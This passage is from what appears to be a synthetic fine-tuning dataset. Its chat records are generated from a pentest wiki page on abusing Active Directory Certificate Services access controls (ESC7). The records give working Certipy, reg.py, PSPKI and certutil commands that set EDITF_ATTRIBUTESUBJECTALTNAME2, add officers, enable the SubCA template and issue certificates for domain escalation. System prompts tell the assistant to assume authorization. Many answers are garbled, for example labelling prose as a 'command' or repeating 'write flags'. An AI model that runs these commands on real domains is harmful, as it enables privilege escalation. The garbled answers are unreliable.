(PowerShell) can be used to modify the CA object (RSAT is needed on the machine where PSPKI is run).\n\n``powershell\nCertify.exe cas", "metadata": {"corpus_index": 19, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through write flags"}, {"role": "assistant", "content": "reg.py \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@$\"ADCS_IP\" add-keyName 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\CA-NAME\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy' -v editflags -vd NEW_VALUE\n``\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object.\n\nThen, PSPKI (PowerShell) can be used to modify the CA object (RSAT is needed on the machine where PSPKI is run).\n\n``powershell\nCertify.exe cas"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through write flags", "response": "reg.py \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@$\"ADCS_IP\" add-keyName 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\CA-NAME\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy' -v editflags -vd NEW_VALUE\n``\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object.\n\nThen, PSPKI (PowerShell) can be used to modify the CA object (RSAT is needed on the machine where PSPKI is run).\n\n``powershell\nCertify.exe cas", "metadata": {"corpus_index": 19, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on write flags"}, {"role": "assistant", "content": "=== Windows\n\nFrom Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object.\n\nThen, [PSPKI](https://github.com/PKISolutions/PSPKI) (PowerShell) can be used to modify the CA object ([RSAT](https://docs.microsoft.com/fr-fr/troubleshoot/windows-server/system-management-components/remote-server-administration-tools) is needed on the machine where PSPKI is run)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on write flags", "response": "=== Windows\n\nFrom Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object.\n\nThen, [PSPKI](https://github.com/PKISolutions/PSPKI) (PowerShell) can be used to modify the CA object ([RSAT](https://docs.microsoft.com/fr-fr/troubleshoot/windows-server/system-management-components/remote-server-administration-tools) is needed on the machine where PSPKI is run).", "metadata": {"corpus_index": 20, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for write flags. write flags"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for write flags. write flags", "metadata": {"corpus_index": 20, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Get the current value of EDITF_ATTRIBUTESUBJECTALTNAME2 and modify it with SetConfigEntry?"}, {"role": "assistant", "content": "$configReader = New-Object SysadminsLV.PKI.Dcom.Implementations.CertSrvRegManagerD \"CA.domain.local\"\n$configReader.SetRootNode($true)\n$configReader.GetConfigEntry(\"EditFlags\", \"PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy\")\n$configReader.SetConfigEntry(1376590, \"EditFlags\", \"PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy\")"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Get the current value of EDITF_ATTRIBUTESUBJECTALTNAME2 and modify it with SetConfigEntry?", "response": "$configReader = New-Object SysadminsLV.PKI.Dcom.Implementations.CertSrvRegManagerD \"CA.domain.local\"\n$configReader.SetRootNode($true)\n$configReader.GetConfigEntry(\"EditFlags\", \"PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy\")\n$configReader.SetConfigEntry(1376590, \"EditFlags\", \"PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy\")", "metadata": {"corpus_index": 21, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Get the current value of EDITF_ATTRIBUTESUBJECTALTNAME2 and modify it with SetConfigEntry"}, {"role": "assistant", "content": "$configReader = New-Object SysadminsLV.PKI.Dcom.Implementations.CertSrvRegManagerD \"CA.domain.local\"\n$configReader.SetRootNode($true)\n$configReader.GetConfigEntry(\"EditFlags\", \"PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy\")\n$configReader.SetConfigEntry(1376590, \"EditFlags\", \"PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy\")"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Get the current value of EDITF_ATTRIBUTESUBJECTALTNAME2 and modify it with SetConfigEntry", "response": "$configReader = New-Object SysadminsLV.PKI.Dcom.Implementations.CertSrvRegManagerD \"CA.domain.local\"\n$configReader.SetRootNode($true)\n$configReader.GetConfigEntry(\"EditFlags\", \"PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy\")\n$configReader.SetConfigEntry(1376590, \"EditFlags\", \"PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy\")", "metadata": {"corpus_index": 21, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Check after setting the flag (EDITF_ATTRIBUTESUBJECTALTNAME2 should appear in the output)"}, {"role": "assistant", "content": "certutil.exe -config \"CA.domain.local\\CA\" -getreg \"policy\\EditFlags\"\n``\n\nIf RSAT is not present, it can installed like this:\n\n`powershell\nDISM.exe /Online /Get-Capabilities\nDISM.exe /Online /add-capability /CapabilityName:Rsat.CertificateServices.Tools~~~~0.0.1.0\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Check after setting the flag (EDITF_ATTRIBUTESUBJECTALTNAME2 should appear in the output)", "response": "certutil.exe -config \"CA.domain.local\\CA\" -getreg \"policy\\EditFlags\"\n``\n\nIf RSAT is not present, it can installed like this:\n\n`powershell\nDISM.exe /Online /Get-Capabilities\nDISM.exe /Online /add-capability /CapabilityName:Rsat.CertificateServices.Tools~~~~0.0.1.0\n``\n\n:::", "metadata": {"corpus_index": 22, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Check after setting the flag (EDITF_ATTRIBUTESUBJECTALTNAME2 should appear in the output)"}, {"role": "assistant", "content": "certutil.exe -config \"CA.domain.local\\CA\" -getreg \"policy\\EditFlags\"\n``\n\nIf RSAT is not present, it can installed like this:\n\n`powershell\nDISM.exe /Online /Get-Capabilities\nDISM.exe /Online /add-capability /CapabilityName:Rsat.CertificateServices.Tools~~~~0.0.1.0\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Check after setting the flag (EDITF_ATTRIBUTESUBJECTALTNAME2 should appear in the output)", "response": "certutil.exe -config \"CA.domain.local\\CA\" -getreg \"policy\\EditFlags\"\n``\n\nIf RSAT is not present, it can installed like this:\n\n`powershell\nDISM.exe /Online /Get-Capabilities\nDISM.exe /Online /add-capability /CapabilityName:Rsat.CertificateServices.Tools~~~~0.0.1.0\n``\n\n:::", "metadata": {"corpus_index": 22, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the If syntax for check after setting the flag (editf_attributesubjectaltname2 should appear in the output)?"}, {"role": "assistant", "content": "If RSAT is not present, it can installed like this:"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the If syntax for check after setting the flag (editf_attributesubjectaltname2 should appear in the output)?", "response": "If RSAT is not present, it can installed like this:", "metadata": {"corpus_index": 23, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "If"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Check after setting the flag (EDITF_ATTRIBUTESUBJECTALTNAME2 should appear in the output)?"}, {"role": "assistant", "content": "If RSAT is not present, it can installed like this:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Check after setting the flag (EDITF_ATTRIBUTESUBJECTALTNAME2 should appear in the output)?", "response": "If RSAT is not present, it can installed like this:", "metadata": {"corpus_index": 23, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `If RSAT is not present, it can installed like this:`?"}, {"role": "assistant", "content": "This command is used for check after setting the flag (editf_attributesubjectaltname2 should appear in the output). Check after setting the flag (EDITF_ATTRIBUTESUBJECTALTNAME2 should appear in the output)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `If RSAT is not present, it can installed like this:`?", "response": "This command is used for check after setting the flag (editf_attributesubjectaltname2 should appear in the output). Check after setting the flag (EDITF_ATTRIBUTESUBJECTALTNAME2 should appear in the output)", "metadata": {"corpus_index": 23, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Access controls - ESC7 - Abusing SubCA in the context of penetration testing"}, {"role": "assistant", "content": "When it is not possible to restart the CertSvc service to enable the EDITF_ATTRIBUTESUBJECTALTNAME2 attribute, the SubCA built-in template can be used, along with a ManageCA right.\n\nThe SubCA template is vulnerable to the ESC1 attack, but only Domain Admins and Enterprise Admins can enroll in it. If a standard user tries to enroll in it, he will encounter a CERTSRV_E_TEMPLATE_DENIED errror and will obtain a request ID with a corresponding private key.\n\nThis ID can be used by a user with the ManageCA and ManageCertificates rights to validate the failed request anyway. The user can then retrieve the issued certificate by specifying the same ID.\n\n::: tabs\n\n=== UNIX-like\n\nIf the attacker only has the ManageCA permission, Certipy (Python) can be used to enumerate access rights over the CA object (how to enumerate) and modify some CA's attributes like the officers list (an officer is a user with the ManageCertificates right). The attacker could also enable or disable certificate templates.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Access controls - ESC7 - Abusing SubCA in the context of penetration testing", "response": "When it is not possible to restart the CertSvc service to enable the EDITF_ATTRIBUTESUBJECTALTNAME2 attribute, the SubCA built-in template can be used, along with a ManageCA right.\n\nThe SubCA template is vulnerable to the ESC1 attack, but only Domain Admins and Enterprise Admins can enroll in it. If a standard user tries to enroll in it, he will encounter a CERTSRV_E_TEMPLATE_DENIED errror and will obtain a request ID with a corresponding private key.\n\nThis ID can be used by a user with the ManageCA and ManageCertificates rights to validate the failed request anyway. The user can then retrieve the issued certificate by specifying the same ID.\n\n::: tabs\n\n=== UNIX-like\n\nIf the attacker only has the ManageCA permission, Certipy (Python) can be used to enumerate access rights over the CA object (how to enumerate) and modify some CA's attributes like the officers list (an officer is a user with the ManageCertificates right). The attacker could also enable or disable certificate templates.\n\n```bash", "metadata": {"corpus_index": 24, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Access controls - ESC7 - Abusing SubCA during a pentest?"}, {"role": "assistant", "content": "When it is not possible to restart the CertSvc service to enable the EDITF_ATTRIBUTESUBJECTALTNAME2 attribute, the SubCA built-in template can be used, along with a ManageCA right.\n\nThe SubCA template is vulnerable to the ESC1 attack, but only Domain Admins and Enterprise Admins can enroll in it. If a standard user tries to enroll in it, he will encounter a CERTSRV_E_TEMPLATE_DENIED errror and will obtain a request ID with a corresponding private key.\n\nThis ID can be used by a user with the ManageCA and ManageCertificates rights to validate the failed request anyway. The user can then retrieve the issued certificate by specifying the same ID.\n\n::: tabs\n\n=== UNIX-like\n\nIf the attacker only has the ManageCA permission, Certipy (Python) can be used to enumerate access rights over the CA object (how to enumerate) and modify some CA's attributes like the officers list (an officer is a user with the ManageCertificates right). The attacker could also enable or disable certificate templates.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Access controls - ESC7 - Abusing SubCA during a pentest?", "response": "When it is not possible to restart the CertSvc service to enable the EDITF_ATTRIBUTESUBJECTALTNAME2 attribute, the SubCA built-in template can be used, along with a ManageCA right.\n\nThe SubCA template is vulnerable to the ESC1 attack, but only Domain Admins and Enterprise Admins can enroll in it. If a standard user tries to enroll in it, he will encounter a CERTSRV_E_TEMPLATE_DENIED errror and will obtain a request ID with a corresponding private key.\n\nThis ID can be used by a user with the ManageCA and ManageCertificates rights to validate the failed request anyway. The user can then retrieve the issued certificate by specifying the same ID.\n\n::: tabs\n\n=== UNIX-like\n\nIf the attacker only has the ManageCA permission, Certipy (Python) can be used to enumerate access rights over the CA object (how to enumerate) and modify some CA's attributes like the officers list (an officer is a user with the ManageCertificates right). The attacker could also enable or disable certificate templates.\n\n```bash", "metadata": {"corpus_index": 24, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Add a new officier?"}, {"role": "assistant", "content": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -add-officer 'user'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Add a new officier?", "response": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -add-officer 'user'", "metadata": {"corpus_index": 25, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Add a new officier"}, {"role": "assistant", "content": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -add-officer 'user'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Add a new officier", "response": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -add-officer 'user'", "metadata": {"corpus_index": 25, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about List all the templates"}, {"role": "assistant", "content": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -list-templates"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about List all the templates", "response": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -list-templates", "metadata": {"corpus_index": 26, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through List all the templates"}, {"role": "assistant", "content": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -list-templates"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through List all the templates", "response": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -list-templates", "metadata": {"corpus_index": 26, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Enable a certificate template?"}, {"role": "assistant", "content": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -enable-template 'SubCA'\n``\n\nIn order to abuse the SubCA template with ESC7, both ManageCA and ManageCertificates are needed in order to issue a certificate from a failed request.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Enable a certificate template?", "response": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -enable-template 'SubCA'\n``\n\nIn order to abuse the SubCA template with ESC7, both ManageCA and ManageCertificates are needed in order to issue a certificate from a failed request.\n\n``bash", "metadata": {"corpus_index": 27, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Enable a certificate template"}, {"role": "assistant", "content": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -enable-template 'SubCA'\n``\n\nIn order to abuse the SubCA template with ESC7, both ManageCA and ManageCertificates are needed in order to issue a certificate from a failed request.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Enable a certificate template", "response": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -enable-template 'SubCA'\n``\n\nIn order to abuse the SubCA template with ESC7, both ManageCA and ManageCertificates are needed in order to issue a certificate from a failed request.\n\n``bash", "metadata": {"corpus_index": 27, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the In syntax for enable a certificate template?"}, {"role": "assistant", "content": "In order to abuse the `SubCA` template with ESC7, both `ManageCA` and `ManageCertificates` are needed in order to issue a certificate from a failed request."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the In syntax for enable a certificate template?", "response": "In order to abuse the `SubCA` template with ESC7, both `ManageCA` and `ManageCertificates` are needed in order to issue a certificate from a failed request.", "metadata": {"corpus_index": 28, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "In"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Enable a certificate template?"}, {"role": "assistant", "content": "In order to abuse the `SubCA` template with ESC7, both `ManageCA` and `ManageCertificates` are needed in order to issue a certificate from a failed request."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Enable a certificate template?", "response": "In order to abuse the `SubCA` template with ESC7, both `ManageCA` and `ManageCertificates` are needed in order to issue a certificate from a failed request.", "metadata": {"corpus_index": 28, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `In order to abuse the `SubCA` template with ESC7, both `ManageCA` and `ManageCertificates` are needed in order to issue a certificate from a failed request.`?"}, {"role": "assistant", "content": "This command is used for enable a certificate template. Enable a certificate template"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `In order to abuse the `SubCA` template with ESC7, both `ManageCA` and `ManageCertificates` are needed in order to issue a certificate from a failed request.`?", "response": "This command is used for enable a certificate template. Enable a certificate template", "metadata": {"corpus_index": 28, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Issue a failed request (need ManageCA and ManageCertificates rights for a failed request) in the context of penetration testing"}, {"role": "assistant", "content": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -issue-request 100"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Issue a failed request (need ManageCA and ManageCertificates rights for a failed request) in the context of penetration testing", "response": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -issue-request 100", "metadata": {"corpus_index": 29, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Issue a failed request (need ManageCA and ManageCertificates rights for a failed request)"}, {"role": "assistant", "content": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -issue-request 100"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Issue a failed request (need ManageCA and ManageCertificates rights for a failed request)", "response": "certipy ca -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -issue-request 100", "metadata": {"corpus_index": 29, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Retrieve an issued certificate?"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -retrieve 100\n``\n\nThe certificate can then be used with Pass-The-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object, and to request a certificate that requires manager approval.\n\nIn this example, both ManageCA and ManageCertificates are already obtained. There is no known method to obtain the ManageCertificates right.\n\nThen, PSPKI (PowerShell) can be used to approve a certificate request (RSAT is needed on the machine where PSPKI is used). PSPKI is a PowerShell module used to \"simplify various PKI and AD CS management tasks\".\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Retrieve an issued certificate?", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -retrieve 100\n``\n\nThe certificate can then be used with Pass-The-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object, and to request a certificate that requires manager approval.\n\nIn this example, both ManageCA and ManageCertificates are already obtained. There is no known method to obtain the ManageCertificates right.\n\nThen, PSPKI (PowerShell) can be used to approve a certificate request (RSAT is needed on the machine where PSPKI is used). PSPKI is a PowerShell module used to \"simplify various PKI and AD 